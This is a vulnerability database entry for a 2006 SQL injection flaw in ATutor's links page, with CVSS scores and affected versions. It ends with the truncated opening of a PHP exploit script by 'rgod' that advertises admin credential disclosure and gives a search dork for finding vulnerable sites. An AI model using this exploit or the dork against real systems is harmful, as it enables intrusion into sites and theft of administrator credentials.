Published: 05/08/2006 Updated: 17/10/2018
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
VMScore: 655
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in links/index.php in ATutor and previous versions allows remote authenticated users to execute arbitrary SQL commands via the (1) desc or (2) asc parameters.

Affected Products

Vendor Product Versions
Adaptive Technology Resource CentreAtutor1.5.3.1


#!/usr/bin/php -q -d short_open_tag=on <? echo "ATutor <= 1531 'links' blind SQL injection / admin credentials disclosure\n"; echo "by rgod rgod@autisticiorg\n"; echo "site: retrogodaltervistaorg\n"; echo "dork, version specific: \"Web site engine's code is copyright\" \"2001-2006 ATutor\" \"About ATutor\"\n\n"; /* - works rega ...